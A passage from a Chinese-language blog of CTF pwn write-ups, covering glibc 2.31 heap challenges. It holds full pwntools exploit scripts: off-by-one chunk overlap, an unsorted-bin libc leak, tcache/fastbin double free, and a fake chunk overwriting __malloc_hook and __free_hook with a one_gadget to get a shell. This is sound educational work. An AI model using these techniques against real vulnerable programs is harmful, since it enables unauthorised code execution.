class="hljs-built_in">str</span>(index).encode())<br>    p.sendafter(<span class="hljs-string">b&#x27;enter content: \n&#x27;</span>, content)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">printcont</span>(<span class="hljs-params">index</span>):<br>    choose(<span class="hljs-number">3</span>)<br>    p.recvuntil(<span class="hljs-string">b&#x27;enter idx(0~15): \n&#x27;</span>)<br>    p.send(<span class="hljs-built_in">str</span>(index).encode())<br><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">headchunk</span>():<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">__init__</span>(<span class="hljs-params">self, dest, size=<span class="hljs-number">0x28</span></span>):<br>        self.dest = dest<br>        self.size = size<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">out</span>(<span class="hljs-params">self</span>):<br>        payload = flat([self.size, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, self.dest])<br>        <span class="hljs-keyword">return</span> payload<br><br>mal(<span class="hljs-number">0</span>,<span class="hljs-string">b&#x27;aaaa&#x27;</span>)<br>mal(<span class="hljs-number">1</span>,<span class="hljs-string">b&#x27;aaaa&#x27;</span>)<br>mal(<span class="hljs-number">2</span>,<span class="hljs-string">b&#x27;aaaa&#x27;</span>,<span class="hljs-number">0x420</span>-<span class="hljs-number">0x28</span>-<span class="hljs-number">0x10</span>)<br>mal(<span class="hljs-number">3</span>,<span class="hljs-string">b&#x27;aaaa&#x27;</span>)<br><br>free(<span class="hljs-number">1</span>)<br>free(<span class="hljs-number">0</span>)<br>mal(<span class="hljs-number">15</span>, <span class="hljs-string">b&#x27;aa&#x27;</span>)<br><span class="hljs-comment">#free(1)</span><br>edit(<span class="hljs-number">0</span>, <span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">0x17</span>+<span class="hljs-string">b&#x27;b&#x27;</span>)<br>printcont(<span class="hljs-number">0</span>)<br>p.recvuntil(<span class="hljs-string">b&#x27;ab&#x27;</span>)<br><br>r1 = u64(p.recvuntil(<span class="hljs-string">b&#x27;\n&#x27;</span>)[:-<span class="hljs-number">1</span>].ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&#x27;\0&#x27;</span>))<br>h0 = r1 - <span class="hljs-number">0x30</span>*<span class="hljs-number">3</span><br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">f&#x27;the first chunk is : <span class="hljs-subst">&#123;h0:#x&#125;</span>&#x27;</span>)<br><br>h2 = h0 + <span class="hljs-number">0x30</span>*<span class="hljs-number">4</span><br>hc1 = headchunk(h2-<span class="hljs-number">0x8</span>) <span class="hljs-comment">#change h2&#x27;s size</span><br>edit(<span class="hljs-number">0</span>, hc1.out())<br>edit(<span class="hljs-number">1</span>, p64(<span class="hljs-number">0x421</span>))<br>free(<span class="hljs-number">2</span>)<br><br>hc1.dest = h2<br>edit(<span class="hljs-number">0</span>, hc1.out())<br>printcont(<span class="hljs-number">1</span>)<br><br><br>mainarena_96 = u64(p.recvuntil(<span class="hljs-string">b&#x27;\n&#x27;</span>)[:-<span class="hljs-number">1</span>].ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&#x27;\0&#x27;</span>)) <br><br><br>libc = ELF(<span class="hljs-string">&#x27;./libc.so.6&#x27;</span>)<br>libcbase = mainarena_96 - <span class="hljs-number">0x1ecbe0</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">f&#x27;the libcbase is : <span class="hljs-subst">&#123;libcbase:#x&#125;</span>&#x27;</span>)<br><br><span class="hljs-comment">#if offine, libcbase need add 0x30</span><br><br><span class="hljs-comment">#onegadget = libcbase + 0xe3b01 + 0x30</span><br>onegadget = libcbase + <span class="hljs-number">0xe3b01</span><br>freehook = libcbase + libc.sym[<span class="hljs-string">&#x27;__free_hook&#x27;</span>]   <br><span class="hljs-built_in">print</span>(<span class="hljs-string">f&#x27;the freehook is : <span class="hljs-subst">&#123;freehook:#x&#125;</span>&#x27;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">f&#x27;the one_gadget is : <span class="hljs-subst">&#123;onegadget:#x&#125;</span>&#x27;</span>)<br><br>hc1.dest = freehook<br>edit(<span class="hljs-number">0</span>, hc1.out())<br>edit(<span class="hljs-number">1</span>, p64(onegadget))<br>free(<span class="hljs-number">0</span>)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<h2 id="god-of-change"><a href="#god-of-change" class="headerlink" title="god of change"></a>god of change</h2><p>堆 heap,  tcache dup, off-by-one, malloc_hook, one_gadget</p>
<p>libc: 2.31</p>
<h3 id="程序分析-1"><a href="#程序分析-1" class="headerlink" title="程序分析"></a>程序分析</h3><p>程序中功能选择有创建<code>add()</code>，释放<code>delete()</code>，显示<code>show()</code>。(好像是我自己给程序重命名的)</p>
<h4 id="创建函数"><a href="#创建函数" class="headerlink" title="创建函数"></a>创建函数</h4><p>存在很明显的故意的单字节溢出，完全就是怕你看不见。<img src="/./image-20231019210519069.png" alt="image-20231019210519069"></p>
<p>其次，限制了malloc块的大小，最大为0x7f。最后，加了两个数组，分别储存分配chunk的大小和是否在使用，我分别命名为chunkSize和chunkInuse。</p>
<p>最多分配31次chunk。</p>
<h4 id="释放函数"><a href="#释放函数" class="headerlink" title="释放函数"></a>释放函数</h4><p>不检查chunkInuse，不清除对应chunkLIst的指针，可以double free。</p>
<p>会将对应的chunkSize和chunkInuse置0。</p>
<h4 id="显示函数"><a href="#显示函数" class="headerlink" title="显示函数"></a>显示函数</h4><p>会检查chunkInuse。</p>
<h3 id="漏洞利用-1"><a href="#漏洞利用-1" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>依旧是构造unsorted bin泄露libc地址。利用off-by-one修改相邻的chunk的size，造成overlapping。然后伪造大chunk，释放并泄露地址。</p>
<p>可以利用tcache dup进行任意地址读写。高版本对tcache的double free的检查很严用不了，所以释放7个同大小chunk填满tcache，使之后的chunk被放入fastbin，再利用fastbin的double free。这需要目标地址附近能构造fake chunk。</p>
<p>由于free_hook附近比我的脑子还空，所以只能利用malloc_hook，然后覆写为one_gadget。</p>
<p><img src="/./image-20231019213451394.png" alt="image-20231019213451394"></p>
<h3 id="步骤-2"><a href="#步骤-2" class="headerlink" title="步骤"></a>步骤</h3><p>分配一堆chunk，其中chunk3-12用于对齐之后伪造的unsorted chunk，最后分配个chunk13，防止unsort chunk与top chunk合并。</p>
<h4 id="泄露libc地址-1"><a href="#泄露libc地址-1" class="headerlink" title="泄露libc地址"></a>泄露libc地址</h4><p>释放chunk0后再分配，同时覆写chunk1的大小为0x81。释放chunk1，再输入大小0x78分配到chunk1，覆写chunk2对应的size为0x461。</p>
<p>释放chunk2，使其进入unsorted bin。再次释放并分配chunk1，填充<code>&#39;a&#39;</code>到chunk2的内容区。打印chunk1得到mainarena+96的地址。用chunkList[16]读取chunk1，因为chunkList[1]等的chunkInuse已被置0无法调用显示函数。</p>
<h4 id="构造fake-chunk"><a href="#构造fake-chunk" class="headerlink" title="构造fake chunk"></a>构造fake chunk</h4><p>在malloc_hook附近寻找适合的数据。找到个0x7f适合构建fake chunk。</p>
<p><img src="/./image-20231019214339224.png" alt="image-20231019214339224"></p>
<p>黄色为prev_size，蓝色为size，红色为需要覆写的地方。因此fakechunk的真实地址为<code>mallochook-0x30-3</code>，而其填充内容<code>payload=b&#39;\0&#39;*(0x20+3) + p64(one_gadget)</code>。</p>
<p><img src="/./image-20231019215016659.png" alt="image-20231019215016659">该fake chunk释放时会进入0x70的fastbin，所以之前分配了大量0x70真实大小的chunk。释放7个0x70真实大小的chunk。之后再释放一个同大小chunk，并将其fd修改为fake chunk的地址。这里选择再利用chunk1和chunk2构造。修改chunk2的size为0x71，释放chunk1后，再次利用chunk1修改其fd。</p>
<p>最后分配掉tcache里所有chunk，程序会将fastbin内的chunk转化为tcahce里的chunk，再次分配，直到分配到fake chunk并修改malloc_hook的值。</p>
<h4 id="调用one-gadget"><a href="#调用one-gadget" class="headerlink" title="调用one_gadget"></a>调用one_gadget</h4><p>malloc非0值的时候是找不到合适的one_gadget的。但是观察到rdi的值与malloc时输入的size值是一致的，于是我尝试了一下malloc(0)。</p>
<blockquote>
<p>在尝试malloc(0)这之前我打算修改free_hook，然后free含有<code>&quot;/bin/sh\0&quot;</code>的chunk。因此试过unsorted bin attack，unlink。这些都失败了，因为高版本对unlink的检查很严格。还打算尝试多次tcache dup修改main_arena中的top chunk的地址，使其指向free_hook附近，但是分配的chunk就会超过30次。最后想尝试malloc_hook指向reaclloc，然后修改realloc_hook指向one_gadget。在调整malloc_hook指向的起始位置的时候才发现了rdi的值的特点。</p>
</blockquote>
<p><img src="/./image-20231019220812375.png" alt="image-20231019220812375"><img src="/./image-20231019220839000.png" alt="image-20231019220839000"></p>
<p><code>malloc(0)</code>后是如下情况。<img src="/./image-20231019221621145.png" alt="image-20231019221621145"></p>
<p>rdx也变成0了，可以用0xe3b01的one_gadget了。</p>
<p>最后记得malloc(0)手写，毕竟已经收不到<code>b&quot;the content:&quot;</code>了。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python3</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br>isremote = <span class="hljs-number">0</span><br><span class="hljs-keyword">if</span> (<span class="hljs-built_in">len</span>(sys.argv)&gt;<span class="hljs-number">1</span> <span class="hljs-keyword">and</span> <span class="hljs-built_in">int</span>(sys.argv[<span class="hljs-number">1</span>])==<span class="hljs-number">1</span>):<br>    p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="hljs-number">28449</span>)<br>    libc = ELF(<span class="hljs-string">&#x27;./libc.so.6&#x27;</span>)<br>    isremote = <span class="hljs-number">1</span><br><span class="hljs-keyword">else</span>:<br>    p=process(<span class="hljs-string">&#x27;./pwn_pe&#x27;</span>)<br>    <span class="hljs-comment">#gdb.attach(p, &#x27;b *$rebase(0x1592)&#x27;)</span><br>    libc=ELF(<span class="hljs-string">&#x27;/glibc-all-in-one/2.31-0ubuntu9.7_amd64/libc.so.6&#x27;</span>)<br>    <span class="hljs-comment">#gdb.attach(p, &#x27;b malloc&#x27;)</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">choose</span>(<span class="hljs-params">x</span>):<br>    p.recvuntil(<span class="hljs-string">b&#x27;Your Choice: &#x27;</span>)<br>    p.send(<span class="hljs-built_in">str</span>(x).encode())<br>    <br><span class="hljs-keyword">def</span> <span class="hljs-title function_">mal</span>(<span class="hljs-params">content, size=<span class="hljs-number">0x18</span></span>):<br>    choose(<span class="hljs-number">1</span>)<br>    p.sendlineafter(<span class="hljs-string">b&#x27;size: \n&#x27;</span>, <span class="hljs-built_in">str</span>(size).encode())<br>    p.sendafter(<span class="hljs-string">b&#x27;the content: \n&#x27;</span>, content)<br>    <br><span class="hljs-keyword">def</span> <span class="hljs-title function_">free</span>(<span class="hljs-params">index</span>):<br>    choose(<span class="hljs-number">3</span>)<br>    p.recvuntil(<span class="hljs-string">b&#x27;idx: \n&#x27;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(index).encode())<br>    <span class="hljs-keyword">assert</span> <span class="hljs-keyword">not</span> <span class="hljs-string">b&#x27;forbidden&#x27;</span> <span class="hljs-keyword">in</span> p.recvuntil(<span class="hljs-string">b&#x27;1.Create Slot&#x27;</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">printcont</span>(<span class="hljs-params">index</span>):<br>    choose(<span class="hljs-number">2</span>)<br>    p.recvuntil(<span class="hljs-string">b&#x27;idx: \n&#x27;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(index).encode())<br><br>mal(<span class="hljs-string">b&#x27;aa&#x27;</span>)<br>mal(<span class="hljs-string">b&#x27;aa&#x27;</span>) <span class="hljs-comment">#1</span><br>mal(<span class="hljs-string">b&#x27;aa&#x27;</span>) <span class="hljs-comment">#2</span><br>mal(<span class="hljs-string">b&#x27;aa60&#x27;</span>, <span class="hljs-number">0x48</span>) <span class="hljs-comment">#3</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0x460</span>//<span class="hljs-number">0x70</span> -<span class="hljs-number">1</span>):    <span class="hljs-comment">#4 - 12</span><br>    mal(<span class="hljs-string">b&#x27;aa70&#x27;</span>+<span class="hljs-built_in">str</span>(i).encode(), <span class="hljs-number">0x68</span>)<br>mal(<span class="hljs-string">b&#x27;aa&#x27;</span>)<span class="hljs-comment">#13</span><br><br>free(<span class="hljs-number">0</span>)<br>mal(<span class="hljs-string">b&#x27;/bin/sh\0&#x27;</span>.ljust(<span class="hljs-number">0x18</span>, <span class="hljs-string">b&#x27;a&#x27;</span>)+<span class="hljs-string">b&#x27;\x81&#x27;</span>) <span class="hljs-comment">#14-0</span><br><br>free(<span class="hljs-number">1</span>)<br>mal(<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">0x18</span>+p64(<span class="hljs-number">0x461</span>), <span class="hljs-number">0x78</span>) <span class="hljs-comment">#15-1</span><br>free(<span class="hljs-number">2</span>)<br><br>free(<span class="hljs-number">1</span>)<br>mal(<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">0x1f</span> + <span class="hljs-string">b&#x27;b&#x27;</span>,<span class="hljs-number">0x78</span>) <span class="hljs-comment">#16-1</span><br>printcont(<span class="hljs-number">16</span>)<br>p.recvuntil(<span class="hljs-string">b&#x27;ab&#x27;</span>)<br>mainarena_96 = u64(p.recvuntil(<span class="hljs-string">b&#x27;\n&#x27;</span>)[:-<span class="hljs-number">1</span>].ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&#x27;\0&#x27;</span>)) <br><br><br>libcbase = mainarena_96 - <span class="hljs-number">0x1ecbe0</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">f&#x27;the libcbase is : <span class="hljs-subst">&#123;libcbase:#x&#125;</span>&#x27;</span>)<br><br><span class="hljs-keyword">if</span> isremote == <span class="hljs-number">1</span>:<br>    onegadget = libcbase + <span class="hljs-number">0xe3b01</span> <br><span class="hljs-keyword">else</span>:<br>    onegadget = libcbase + <span class="hljs-number">0xe3b31</span><br>freehook = libcbase + libc.sym[<span class="hljs-string">&#x27;__free_hook&#x27;</span>]   <br>mallochook = libcbase + libc.sym[<span class="hljs-string">&#x27;__malloc_hook&#x27;</span>]<br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">f&#x27;the freehook is : <span class="hljs-subst">&#123;freehook:#x&#125;</span>&#x27;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">f&#x27;the malloc_hook is : <span class="hljs-subst">&#123;mallochook:#x&#125;</span>&#x27;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">f&#x27;the one_gadget is : <span class="hljs-subst">&#123;onegadget:#x&#125;</span>&#x27;</span>)<br><br><br>fakechunk0 = mallochook - <span class="hljs-number">0x30</span> - <span class="hljs-number">3</span><br>payload0 = <span class="hljs-string">b&#x27;\0&#x27;</span> * (<span class="hljs-number">0x3</span> + <span class="hljs-number">0x20</span>)  + p64(onegadget)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">4</span>,<span class="hljs-number">11</span>):   <span class="hljs-comment">#4-10 7-&gt;tcache 0x7</span><br>    free(i)<br>free(<span class="hljs-number">1</span>)<br>mal(<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">0x18</span>+p64(<span class="hljs-number">0x71</span>), <span class="hljs-number">0x78</span>)  <span class="hljs-comment">#18-1</span><br>free(<span class="hljs-number">2</span>) <span class="hljs-comment">#fastbin -&gt; 2</span><br>free(<span class="hljs-number">1</span>) <br>mal(<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">0x18</span>+p64(<span class="hljs-number">0x71</span>)+p64(fakechunk0), <span class="hljs-number">0x78</span>)  <span class="hljs-comment">#19-1</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">7</span>): <br>    mal(<span class="hljs-string">b&#x27;cc70&#x27;</span>+<span class="hljs-built_in">str</span>(i).encode(), <span class="hljs-number">0x68</span>)<br><span class="hljs-comment"># tcache -&gt; 2 -&gt; fake</span><br>mal(<span class="hljs-string">b&#x27;cc&#x27;</span>, <span class="hljs-number">0x68</span>)   <span class="hljs-comment">#from fastbin    #2</span><br>mal(payload0, <span class="hljs-number">0x68</span>)  <br><br>choose(<span class="hljs-number">1</span>)<br>p.recvuntil(<span class="hljs-string">b&#x27;size: \n&#x27;</span>)<br>p.send(<span class="hljs-string">b&#x27;0&#x27;</span>)<br><br>p.interactive()<br></code></pre></td></tr></table></figure>


    </div>
</article>


                </div>
                <aside class="col-md-4 gal-left" id="sidebar">
    <!-- 此为sidebar的搜索框, 非搜索结果页面 -->
<aside id="sidebar-search">
    <div class="search hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <form class="form-inline clearfix" id="search-form" method="get"
              action="/search/index.html">
            <input type="text" name="s" class="form-control" id="searchInput" placeholder="搜索文章~" autocomplete="off">
            <button class="btn btn-danger btn-gal" type="submit">
                <i class="fa fa-search"></i>
            </button>
        </form>
    </div>
</aside>
    <aside id="sidebar-author">
    <div class="panel panel-gal" data-aos="flip-right" data-aos-duration="3000">
        <div class="panel-heading" style="text-align: center">
            <i class="fa fa-quote-left"></i>
            Walt CSZ
            <i class="fa fa-quote-right"></i>
        </div>
        <div class="author-panel text-center">
            <img src="/imgs/avatar.jpg" width="140" height="140"
                 alt="个人头像" class="author-image">
            <p class="author-description"></p>
        </div>
    </div>
</aside>
    
    <aside id="sidebar-recent_comments">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-comments"></i>
            最新评论
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush"></ul>
    </div>
</aside>
    
    <!-- 要配置好leancloud才能开启此小工具 -->
    
    
    <aside id="sidebar-recent_posts">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-refresh"></i>
            近期文章
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush">
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/10/26/writeUp/0xgame/">0xgame</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/10/23/writeUp/newstarctf2023_week5/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/10/20/writeUp/newstarctf/">newstarctf</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/10/19/hello-world/">Hello World</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/10/19/writeUp/newstarctf2023_week4/">newstartctf2023_week4</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/09/11/writeUp/buu_0910/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/09/07/writeUp/%E5%BC%82%E6%9E%B6%E6%9E%84/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/09/03/writeUp/wmctf23/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/08/31/writeUp/buu_0830/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/08/26/writeUp/buu_0824/"></a>
                </span>
            </li>
            
        </ul>
    </div>
</aside>
    
    
    <aside id="sidebar-rand_posts">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-refresh"></i>
            随机文章
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush">
            
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/08/26/writeUp/buu_0824/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/08/31/writeUp/buu_0830/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/08/12/writeUp/moectf/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/09/03/writeUp/wmctf23/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/08/12/writeUp/%E5%A0%86/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/09/07/writeUp/%E5%BC%82%E6%9E%B6%E6%9E%84/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/08/20/writeUp/%E6%B1%87%E7%BC%96/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/07/19/writeUp/%E7%8E%AF%E5%A2%83/"></a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/10/26/writeUp/0xgame/">0xgame</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/10/20/writeUp/newstarctf/">newstarctf</a>
                </span>
            </li>
            
        </ul>
    </div>
</aside>
    
    
    <aside id="gal-sets">
        <div class="panel panel-gal hidden-xs" data-aos="fade-up" data-aos-duration="2000">
            <ul class="nav nav-pills pills-gal">

                
                <li>
                    <a href="/2023/10/20/writeUp/newstarctf/index.html#sidebar-tags" data-toggle="tab" id="tags-tab">热门标签</a>
                </li>
                
                
                <li>
                    <a href="/2023/10/20/writeUp/newstarctf/index.html#sidebar-friend-links" data-toggle="tab" id="friend-links-tab">友情链接</a>
                </li>
                
                
                <li>
                    <a href="/2023/10/20/writeUp/newstarctf/index.html#sidebar-links" data-toggle="tab" id="links-tab">个人链接</a>
                </li>
                
            </ul>
            <div class="tab-content">
                
                <div class="cloud-tags tab-pane nav bs-sidenav fade" id="sidebar-tags">
    
</div>
                
                
                <div class="friend-links tab-pane nav bs-sidenav fade" id="sidebar-friend-links">
    
    <li>
        <a href="http://kdays.net/days/" target="_blank">KDays Forum</a>
    </li>
    
    <li>
        <a href="http://www.gal123.com/" target="_blank">绅士导航♂</a>
    </li>
    
    <li>
        <a href="http://www.moe123.com/" target="_blank">萌导航</a>
    </li>
    
</div>
                
                
                <div class="links tab-pane nav bs-sidenav fade" id="sidebar-links">
    
    <li>
        <a href="https://github.com/ZEROKISEKI/" target="_blank">Github</a>
    </li>
    
    <li>
        <a href="https://coding.net/u/SORA1" target="_blank">Coding</a>
    </li>
    
    <li>
        <a href="https://www.zhihu.com/people/aonosora/activities" target="_blank">知乎</a>
    </li>
    
</div>
                
            </div>
        </div>
    </aside>
    
</aside>
            </div>
        </div>
    </div>
    <footer id="gal-footer">
    <div class="container">
        Copyright © 2018 Walt CSZ Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>.&nbsp;Theme by <a href="https://github.com/ZEROKISEKI" target="_blank">AONOSORA</a>
    </div>
</footer>

<!-- 回到顶端 -->
<div id="gal-gotop">
    <i class="fa fa-angle-up"></i>
</div>
</body>

<script src="/js/activate-power-mode.js"></script>

<script>

    // 配置highslide
	hs.graphicsDir = '/js/highslide/graphics/'
    hs.outlineType = "rounded-white";
    hs.dimmingOpacity = 0.8;
    hs.outlineWhileAnimating = true;
    hs.showCredits = false;
    hs.captionEval = "this.thumb.alt";
    hs.numberPosition = "caption";
    hs.align = "center";
    hs.transitions = ["expand", "crossfade"];
    hs.lang.number = '共%2张图, 当前是第%1张';
    hs.addSlideshow({
      interval: 5000,
      repeat: true,
      useControls: true,
      fixedControls: "fit",
      overlayOptions: {
        opacity: 0.75,
        position: "bottom center",
        hideOnMouseOut: true
      }
    })

    // 初始化aos
    AOS.init({
      duration: 1000,
      delay: 0,
      easing: 'ease-out-back'
    });

</script>
<script>
	POWERMODE.colorful = 'true';    // make power mode colorful
	POWERMODE.shake = 'true';       // turn off shake
	// TODO 这里根据具体情况修改
	document.body.addEventListener('input', POWERMODE);
</script>
<script>
    window.slideConfig = {
      prefix: '/imgs/slide/background',
      ext: 'jpg',
      maxCount: '6'
    }
</script>

<script src="/js/hs.js"></script>
<script src="/js/blog.js"></script>




</html>